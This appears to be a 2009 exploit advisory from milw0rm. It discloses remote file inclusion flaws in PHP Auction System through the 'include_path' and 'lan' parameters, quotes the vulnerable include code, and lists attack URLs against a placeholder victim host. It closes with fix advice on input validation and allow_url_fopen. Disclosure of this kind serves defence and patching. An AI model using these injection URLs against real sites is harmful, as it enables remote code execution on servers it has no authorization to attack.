[»]=======================================================================================================[_][-][X]
[»] [»]
[»] PHPAuctionSystem Multiple Remote File Inclusion Vulnerability [»]
[»] [»]
[»] ======= ------d-------m------ ==== ==== [»]
[»] || = | |(o o)| | || || || [»]
[»] || = ||(~)|| || || [»]
[»] ======= /|\ || || [»]
[»]=============================================================================================================[»]
[»] Author : ~darkmasking~ [»]
[»] Date : January, 6th 2009 [»]
[»] Web : https://www.idsafeshield.com [»]
[»] Contact : support[at]idsafeshield[dot]com [»]
[»] Critical Level : Dangerous [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] Affected software description : [»]
[»] Software : PHP Auction System [»]
[»] Vendor : http://www.phpauctions.info/ [»]
[»] Price : $59.99 [»]
[»]=============================================================================================================[»]
[»] [»]
[»] [~] Vulnerable file [»]
[»] [»]
[»] [+] all file below is affected by "include_path" parameter [»]
[»] [»]
[»] ./includes/settings.inc.php [»]
[»] $password_file = $include_path."passwd.inc.php"; [»]
[»] include($password_file); [»]
[»] include $include_path."fonts.inc.php"; [»]
[»] include $include_path."fontsize.inc.php"; [»]
[»] include($include_path."currency.inc.php"); [»]
[»] include($include_path."errors.inc.php"); [»]
[»] include($include_path."https.inc.php"); [»]
[»] [»]
[»] ./includes/auction_confirmation.inc.php [»]
[»] require("./includes/messages.inc.php"); [»]
[»] [»]
[»] ./includes/converter.inc.php [»]
[»] include($include_path."nusoap.php"); [»]
[»] [»]
[»] ./includes/messages.inc.php [»]
[»] require($include_path.'messages.'.$language.'.inc.php'); [»]
[»] [»]
[»] ./includes/stats.inc.php [»]
[»] include $prefix."includes/useragent.inc.php"; [»]
[»] include $prefix."includes/domains.inc.php"; [»]
[»] [»]
[»] ./includes/useragent.inc.php [»]
[»] include $prefix."includes/browsers.inc.php"; [»]
[»] include $prefix."includes/platforms.inc.php"; [»]
[»] [»]
[»] ./includes/user_confirmation.inc.php [»]
[»] require("./includes/messages.inc.php"); [»]
[»] [»]
[»] [»]
[»] [+] All file below is affected by "lan" parameter [»]
[»] [»]
[»] ./browse.php [»]
[»] ./search.php [»]
[»] if(!empty($_GET['lan'])) { [»]
[»] $language = $lan; [»]
[»] $_SESSION['language'] = $language; [»]
[»] [»]
[»] #// Set language cookie [»]
[»] setcookie("USERLANGUAGE",$lan,time()+31536000,"/"); [»]
[»] } elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) { [»]
[»] $language = $SETTINGS['defaultlanguage']; [»]
[»] $_SESSION['language'] = $language; [»]
[»] [»]
[»] #// Set language cookie [»]
[»] setcookie("USERLANGUAGE",$language,time()+31536000); [»]
[»] } elseif(isset($_COOKIE['USERLANGUAGE'])) { [»]
[»] $language = $_COOKIE['USERLANGUAGE']; [»]
[»] } [»]
[»] [»]
[»] require($include_path.'messages.'.$language.'.inc.php'); [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Exploit [»]
[»] [»]
[»] [+] "include_path" parameter [»]
[»] [»]
[»] http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode] [»]
[»] [»]
[»] [»]
[»] [+] "lan" parameter [»]
[»] [»]
[»] http://www.darkvictims.com/[path]/browse.php?lan=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/search.php?lan=[darkcode] [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] How to fix this vulnerability [»]
[»] [»]
[»] Edit the source code to ensure that input is properly validated. Where is possible, [»]
[»] it is recommended to make a list of accepted filenames and restrict the input to that list. [»]
[»] [»]
[»] For PHP, the option allow_url_fopen would normally allow a programmer to open, [»]
[»] include or otherwise use a remote file using a URL rather than a local file path. [»]
[»] It is recommended to disable this option from php.ini. [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Greetz [»]
[»] [»]
[»] BUAT DIRI SENDIRI AJA [ Sorry Bro belum dapat teman :) ] [»]
[»] [»]
[»] [»]
[»]=============================================================================================================[»]
# milw0rm.com [2009-01-06]